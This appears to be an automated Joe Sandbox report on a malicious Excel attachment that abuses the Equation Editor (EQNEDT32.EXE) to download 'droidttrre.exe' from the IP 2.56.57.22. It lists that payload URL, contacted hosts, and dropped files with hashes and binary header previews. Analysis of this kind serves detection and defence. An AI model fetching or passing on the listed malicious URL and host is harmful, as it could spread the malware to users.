http://repository.certum.pl/ctsca2021.cer0	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://crl.certum.pl/ctnca.crl0k	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://subca.ocsp-certum.com05	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://2.56.57.22/droidttrre.exej	EQNEDT32.EXE, 00000002.00000002.975505837.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com02	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://www.nero.com	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://subca.ocsp-certum.com01	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false	URL Reputation: safe	unknown
http://2.56.57.22/droidttrre.exeooC:	EQNEDT32.EXE, 00000002.00000002.975219877.000000000054F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://repository.certum.pl/ctnca2.cer09	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://www.avast.com0/	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	false	URL Reputation: safe	unknown
http://2.56.57.22/droidttrre.exeP	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	venxajlddf.exe, 00000004.00000000.963495241.000000000040A000.00000008.00000001.01000000.00000004.sdmp, venxajlddf.exe, 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
http://www.symauth.com/cps0(	venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	false		high
http://www.certum.pl/CPS0	EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	false		high
https://github.com/dotnet/runtime	venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
2.56.57.22	unknown	Netherlands		395800	GBTCLOUDUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	635062
Start date and time: 27/05/202212:01:07	2022-05-27 12:01:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@4/21@0/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 86% (good quality ratio 84.7%) Quality average: 87.8% Quality standard deviation: 21.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .xls Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
TCP Packets have been reduced to 100
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:01:43	API Interceptor	121x Sleep call for process: EQNEDT32.EXE modified

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	1449584
Entropy (8bit):	7.9198763448081495
Encrypted:	false
SSDEEP:	24576:KY9Mbnf2VYqw1ubzB3Gk+VQOIT/DrboejxAseAb7pexIlu7T6SW4gjs2H:39Mbnf5+PwkEs/ToejptpeilqT6SL4
MD5:	2A384E15F8133C8B9ECEFA4DA1D96CEE
SHA1:	346475908F4F76A3C76D7E6D60E58DEBAB862DAA
SHA-256:	401BAE096C7E9DF1B24BF3A34E4A711A2C955700A8B719972B45BDFD10DDEBD2
SHA-512:	73E97BCB16362476259FC154E293EC2B0DAA9FF011902D406330EB3AF7352C9DEC6CBF4709C6C09BA7A0FC18E5FECC8F90D07C64A9F96B7ED071F12ECFCD4A30
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 32%, Browse Antivirus: ReversingLabs, Detection: 38%
Reputation:	low
IE Cache URL:	http://2.56.57.22/droidttrre.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.................................[.....@.............................................h-..........P... ............................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...h-..........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	169096
Entropy (8bit):	3.369564690022728
Encrypted:	false
SSDEEP:	1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
MD5:	DCF8C56CAB759D132AD0B11703B8015C
SHA1:	C656AF02D26A18CE716A28C36B34BEE75D00E2B4
SHA-256:	38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
SHA-512:	F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
Malicious:	false
Reputation:	low
Preview:	....l...........[...y...........%...J... EMF................................@.......................0]..8...Q...............[...y...................\...z...P...(...x........... ...\...z...(...Z...z..... .......................................................................................................................]..V...e,..g...\ ..Q...[...M...]!..V...Q...W...\...h/..i1..Y...\...L...Y...^"..M..~G..}G..}F..}F..}F..}F..}F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..\|F..}G...L......................................................................{{{..................................................................................................................................................................................................................................................................................................N...S...S...S...W...X...g...h0..Y...T...W...O...^"..b(..M...M..._$.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91FDCC81.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 731 x 391, 8-bit/color RGB, interlaced
Category:	dropped
Size (bytes):	114223
Entropy (8bit):	7.9934212565976415
Encrypted:	true
SSDEEP:	1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
MD5:	7F72BA3C4366E5F9603DC0FE9C70D4E4
SHA1:	FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
SHA-256:	4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
SHA-512:	B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...............9x....sRGB.........gAMA......a.....pHYs..........+......IDATx^......c7..7z.J !.@..ww.`..........-.......\|......d.g..........g...]....<.\.l/.......e...w..Q...\.y..qR.0.$&M.D..^....O...M.../...e.6....$..=..M.'a.@JQz.y.....4..a>p.....N.....>E."..z....C...U.W^..qc...Z.f.).........S.D.}...c...t.R.x..e..$...........T.i.&...+J.,...&!f%....;$.+!(.J...ZPe.....RJ..-.Q....l.v..._~.e).....T...a.w.......Jy..E1<>S.....q...T...Z.'.O)A....l..M...Qz.....=...I.3\|..}.Y.\|....9...6m.0<...q..+V<u......}.](..W_}.....,0U.......[....'.....]..L.2_\|..Y.-Z4....N)%A..o..&..{..e.H...../]..[..)..[....9.K...{.c.j-r..o......t.TA............q..q._}..].4...L..'K.fG..M........,. ....;.]C.[...4i.h......$I.t...E..5..x....>}....N..'L..}.....#+.~.H.N.8A.Pf.M.[.,Xp.%.$....n.:....(..$......N.J+.o.>t1n.8.......#R.{.....^...r..r+.{.I.7o.V.i.E@.....e.B}G\Dl....R.@..u......}..`j..n.8..J.a.g.\|-cc..v.Z..-._,Z..{...o..y.f.

C:\Users\user\AppData\Local\Temp\APPEASINGLY.ned

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	data
Category:	dropped
Size (bytes):	16931
Entropy (8bit):	7.988405091967319
Encrypted:	false
SSDEEP:	384:dCeKjNm3J3qfD2FyuSduqIl2nCFv5qkRWgkPTDw:d+Ne3qfSOAq82e51A4
MD5:	720AAF19A8588A7E668DB28B85FFD069
SHA1:	777C3CFB857DEDF40433390DE006825636D66785
SHA-256:	BDC7D0BE5DE4F77EFF2418C609B1BB6234894CF22985D3F2FDBEA18AF7EC4823
SHA-512:	703EE5D003E6BE338D48D15F36ED76727DA47A0CACD9448BE54CB671B92DE73EFBB572D58660F756A000C59AD6C8B57F88E881E057B8A4411382FE593199EB01
Malicious:	false
Reputation:	low
Preview:	.'pv...J........0d]"..M..J.hrk3.j.".A).x.-...Z.......J...A.<.6.n..6!.u.a....K.6..B....<..=.......K...\|....I...h......3.S.u........Z....'..m.<..S_)....O..F..7...Uw'.+.(....':..x.{.~Gn.f.R...%.6..C.l8..h.{.m...({z........X.}."k...4.K.f...]v...<.R..f..)........X9...7Zj...#c.?H.#P.f.....=.4.M.....;.....?.....`'j@..I.>....j."..5.....Yo...9..).......8Y.Gv.._..w\{.j....3+6...a....^..........8L.].9.n.q..C......V.{...FlY.-B.O.o-^.BYF..V.(&.k3..@G.}.F.4...J..E..Dsi....a.?i].I.+3.U....EQ...T..<l.7...[v..Sm.....-....?E.O.z[.0.T..)..vai..L:.....@=t........Z..d-.t..\....M.dXrix.!.O@...a]T.xw.Gag..P.,yR..<6r..]...b.'P.Zh. ....4...j.}...b...@..1..j...)bAa....Q...............1..=b...Ll.._.U.v.IT...5...\|o..X$%..x.......^..7F_%.1@G.L.J.m.:l.n.?.+...f...(..PZ.:l..T%<.....Cd..:......@.U........:T......E.d...\....=.lzO..^.....Z..5F..a...j8...rw. .Z.Y.D<7...I.V.N.....m...G.N ......5>..Ik.^..... .D.).j5%..-:.`K.6\$.......x..u7P##A. .-...T..........Pr..c?Wt^.'.Z

C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1955040
Entropy (8bit):	6.826653374498559
Encrypted:	false
SSDEEP:	49152:T3VwASOuGtlq2fIU6iFm7+BSGYsFoXOh5PGP1T/eacB4dPFPxat:vw+FDKXkuLPxS
MD5:	39981C2A1465413B506246DA3721D9A1
SHA1:	213C41C908F9A7C62C4D5D8079FC17188066CB3B
SHA-256:	19AE2C74ECE76F6AE7074AC31B198D6BF201DDE201B5B31EACA023877241F7B9
SHA-512:	F047681FF16D7C428E39D6A705BDD290B7EA227AC8176E69B989B90297541CD2A596B71673E6DFA0ACB83B201EB815E0518D52169D9FC48C6AEBF78DCB998D7D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8.}.k.}.k.}.k..Rk.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k...j.}.k.}.k.\|.k.}.k.}.kg..j3\|.kf..j.}.kf.>k.}.k.}Vk.}.kf..j.}.kRich.}.k................PE..d....j.`.........."............................@.............................0...........`..................................................c...................................L.....p...........................@................ ...............................text............................... ..`.rdata..*j... ...l..................@..@.data...0e......."...z..............@....pdata..............................@..@.rsrc................b..............@..@.reloc...L.......N...h..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BD3.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fecundify.lnk

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	modified
Size (bytes):	932
Entropy (8bit):	3.117233192641325
Encrypted:	false
SSDEEP:	12:8wl0gYTXCG7GyuR+/fGWNiXKNM1Q18//NJkKAB3YilMMEpxRljK:8PSUqRQUKmqSVHAx3q
MD5:	C76D39C93A427005CB421071CAFC4B05
SHA1:	3E840AE2C2D7CE259EA622A6C0410A9E25A20C65
SHA-256:	3829F36B6A7395AFA6FE905974A1D6404A0251A7A1AE1FDBE9377B7F102A48A4
SHA-512:	90194C33717A394AD505D9A2168AE363F22DC4C1752A3F438DD918B8D16A3CAC25DB255933403C7D6D1EC5D2FBEADD74D3F869ADB4142916932F20A16D408773
Malicious:	false
Preview:	L..................F........................................................#....P.O. .:i.....+00.../C:\...................L.1...........Users.8.......................................U.s.e.r.s.....L.1...........user.8.......................................A.l.b.u.s.....R.1...........AppData.<.......................................A.p.p.D.a.t.a.....L.1...........Local.8.......................................L.o.c.a.l.....J.1...........Temp..6.......................................T.e.m.p.....t.2...........Unoppignorated.exe..R.......................................U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e...".......\.U.n.o.p.p.i.g.n.o.r.a.t.e.d...e.x.e.!.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.................

C:\Users\user\AppData\Local\Temp\MsMpLics.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20008
Entropy (8bit):	6.8686823517057265
Encrypted:	false
SSDEEP:	384:xWgEHWp1v7S+10QnqiZwtfXbMpBjn0aq8f0DBRJYHClXLRXoS:nEijw8Be1PqspoS
MD5:	797476E8813090CC62D574BB9B59F2DD
SHA1:	BDBBBFD1B3B2E8B2CCF368815DCF06247FC08C14
SHA-256:	85C2314ECAA192D438DEBFAB7490E047C7780EB59A115DFEB68E36BF84CFAC22
SHA-512:	42A6AC5750DC4F8D533AD03098348732519AE27C0EE002C4B5953205D5108EAE24C09BFFD587874FCB1DA422152A5B71DD778B58BFA760683C0A565B09C7F936
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....+............" .........................................................0.......c....`.......................................................... ..P...............(<..............8............................................................................rdata..............................@..@.rsrc...P.... ......................@..@.....+..........T...8...8........+..........$...................8....rdata..8...x....rdata$zzzdbg.... ..0....rsrc$01....0!.. ....rsrc$02.... ....n->..;..^.....=1.[.$H.m...+..........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\REPREHENSION.Deb

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	data
Category:	dropped
Size (bytes):	85246
Entropy (8bit):	6.4805953381180315
Encrypted:	false
SSDEEP:	768:yr5hV/bhHsCTDikGVVqs6z11oJ2eSBvENsTxnLn1DA/X+DgenbMPh6kxTmIH:yr31hG3qJKJ2eSBvENsTxL1DGUzn+6Rw
MD5:	DD5E10F58A7CE09C6522970C94A22F15
SHA1:	A6D30052B6501F26744F50E5A0D12075A9A7B5A6
SHA-256:	CE27CCC1A48E9FD81E590DDD15BA23A888B8853F112902C844AABBBFBCFC5925
SHA-512:	6E3EC39E076CA1936F5685CAC1903C3871382119E62C83B9AF55F288BCEECBFC552DE683EA61032255E3E7E12A6BBBF2041B14EAD26A907F1D1ECCCBBF795115
Malicious:	false
Preview:	............0l.*lZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ..y.....f.j....'..+A...................................f!.f.d...f...f.........&N.<V$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$...f.f...f....g...f..../].(]...........................................f......a.....g..$}..V>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.............%.kw.................................W......f...f....,...eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee ........f......7+.hJYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY.....f.e...~....!;I.z"""""""""""""""""""""""""""""f....w...f.f....`..".&^.............................................2`...................................................f.r..f...f...f.h.....w.+..%H........................................0........f.e......15}Fz......................................................... b&]3............................ .f.k.....f............,,,,,,,,,,,,,,,,,,,,,,,,,...f.q.X..f.j...f.s...3,..+...............................................f.....f.....f.k..&..<^......

C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	71280
Entropy (8bit):	6.498681502225803
Encrypted:	false
SSDEEP:	1536:OOsuxD2ljgTCcxduILBZIdf7lgzd/I0bWBuMp/xj0:OMxyold9lZI7lOpI0bauH
MD5:	BBA87C141D8F08D86033E05DAAC57D5D
SHA1:	1EA5B7EE9B5C418FB4B15EE91F7524F5DB0D96D1
SHA-256:	EFD311B206AB942C188C3F83AEBE13AEF1D475CB5D822CF3B70AB162DCDC6FF7
SHA-512:	20581E2243E5FE63174EAB6A4424C6F3B06D5582984FBF35707C00813FF662F3232C06160A5365B14F1E7FD7D861CA1702B974B3C2D8DA5C3340D6588CA0C82C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....\............" ......................................................... ......W.....`...@......@............... ..................................L...d(..........p$......p.......T...........................................................P...H............text............................... ..`.data...............................@....reloc..p...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........T.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...0.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

C:\Users\user\AppData\Local\Temp\Undergangsstemningen.ini

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.256149238118269
Encrypted:	false
SSDEEP:	3:TFXV4ovxEun:Plv5n
MD5:	CEA246A40ED9A68F27EEC9458A18DEEF
SHA1:	3E210EBBD8F29926A51BA1074FAD9A22D53659D2
SHA-256:	2F37518683B8AA7E7C81B0F07A42B2A2692CA32FE4DEEB6618470A5EB245B2EC
SHA-512:	DD12CD2ECC855C0089E641986318FAF183E48798D5EE6F55BADF652186B8177D719FC2E631EF5C6353290827E96ADB59A715E3B82E956908D15012F01A91F9AB
Malicious:	false
Preview:	[Fortovsretter]..Tagged=SNIPPENS..

C:\Users\user\AppData\Local\Temp\avutil-54.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714072
Entropy (8bit):	6.248486521119856
Encrypted:	false
SSDEEP:	12288:1nBVHwA0eIjodibcTTMIVNQdqu8JbHfySBpHdiChBA:FBVJVNQoL1
MD5:	19ED470A232B01BB34B7F85288B017F0
SHA1:	4AE08D71FB45055FCCB0D86174150082A39881F1
SHA-256:	CF17BEE0C9479D7AAED9D3399E79FD89ED9535175C9AEEA73C54E48124D6C81A
SHA-512:	5EBC96C5B13A0D79C0C149C59E30AFC28AECC0FBA543A018551A1F83CEE0111EABAED8400B92694739A3734BDE64F23334BBEAEE28AACBC99358CCA075C82682
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L,/B-B\|B-B\|B-B\|..\|G-B\|..\|k-B\|..\|.-B\|..\|.-B\|B-C\|(-B\|.Z.\|G-B\|B-B\|A-B\|a.\|.-B\|$.\|C-B\|$.\|C-B\|RichB-B\|................PE..L......V.........."!.....J...........o.......`...............................p............@......................... ...=... ..<.......................X3...0..P0..Pk..8...........................x...@............"..P............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data...@....`.......L..............@....idata....... .......h..............@....reloc...9...0...:...x..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\folder-publicshare.png

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PNG image data, 16 x 16, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	585
Entropy (8bit):	6.901794968845596
Encrypted:	false
SSDEEP:	12:6v/7X0Z7HBwN1+swFIzRqwnN14BZlEcFCF2BoCaTxT4:C0BqEWqQ8YGCgBoCaT14
MD5:	1D98E1B2D84D7B9D0927F6B651EDE827
SHA1:	A1F77FF7EC77865AEF6A4C1B64CC4E3C492090A5
SHA-256:	A9109F45EFD9920700AAF489167AE647FB0BF88CE12AAF69502AD6D1505CB7B3
SHA-512:	A13756009BC37481EBA3B8523EC0458A43459E34F8A81CFC924E20F9B7A68936DF4B321376B5C4DFE464E5AE403876EBB3CE96EE394C7BF1B46094CE9BC2E958
Malicious:	false
Preview:	.PNG........IHDR.............(-.S....sBIT.....O.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.Adwaita Folder Icons.._.....tEXtAuthor.Lapo Calamandrei..*...RtEXtCopyright.CC Attribution-ShareAlike http://creativecommons.org/licenses/by-sa/4.0/.Tb....~PLTE.........................................~...............................................................................l.....tRNS.@NS.................{IDAT.WU....0..#....9..!B...Aj)..Sv.,.....`....q..h..w..g..u.4X.x~...#S..d)...D..-W.[A4.ea...nf./.....`..\|...W.}.e<.:\......~..%....IEND.B`.

C:\Users\user\AppData\Local\Temp\krista.ini

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.853055907333276
Encrypted:	false
SSDEEP:	3:rqh2mJUKMJjwD:raJ8JjI
MD5:	6EA2EDF492D8337635DDCD02048BFA32
SHA1:	3F86F5C6398972128ABD8822B5BD1BFE446C6517
SHA-256:	35E1C059B4E54107456E898FBED2CFA59289F9272495014B4396C8ED427EBC95
SHA-512:	56EC3DBDA7B837E26520F90E4D336FDB95D0789BE8A15E034526ED4553683E93F9C116FC57BCAC2C37DAEA516AFAC48CEE39F5BA6363415A4DA68806E1F6BAF9
Malicious:	false
Preview:	[ARBEJDSKLIMA]..Sporangia57=SPOTTEFUGL..

C:\Users\user\AppData\Local\Temp\lang-1045.dll

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	174600
Entropy (8bit):	3.9275478025543364
Encrypted:	false
SSDEEP:	1536:lkoZp1DEqOBdglkr6myEGXRC5bWgiViQFpETgevYNBVe/d:qoZHq+4UXRC5b0ViQFpNQd
MD5:	E10F0042C0EE3B2DE59BEC61D3811C6A
SHA1:	0F75AEEE0338D2E563FD146847E21187C68FD75F
SHA-256:	20DA8A600117A2ACC6A66AD493390D1DA3F8A9CC7FF13A8185EC02A0E5C93B2B
SHA-512:	BA174D089A52135E9CEE8704749D9C44C4EC361C34E09C26CCFB4A34EB69590FCA77250E17B1ED68506B4C0EC958A2B17DED25741177D77CA68D05CDB1ED2FBC
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..h................ ...........................................................................................rdata..p...........................@..@.rsrc...h.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...d...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\multimedia-volume-control-symbolic.symbolic.png

Download File

Process:	C:\Users\user\AppData\Roaming\venxajlddf.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	225
Entropy (8bit):	6.661593260259915
Encrypted:	false
SSDEEP:	3:yionv//thPl9vt3lAnsrtxBllE+UwHndZxx3hYB84wXKYAIk9d0LPoBHlNHbEezI:6v/lhPysHUunYBcXKYA59dPFxRbZofp
MD5:	E91514290CFC6F38580278374D3C6B0F
SHA1:	068CB1200349717E8D2EE64475F480C850A85099
SHA-256:	0DE516FC5D5A233BC240F055C70B004160CE4FA2364C93CC12D7D1A60C23420D
SHA-512:	A6C1523D984857924FDDEFD48741B6FB552CAC220D53619F3E572799DACC0EE06B1FBF75D9CDC127BB685BADB4933FFD4F4923E341492307C55BE4C196510C57
Malicious:	false
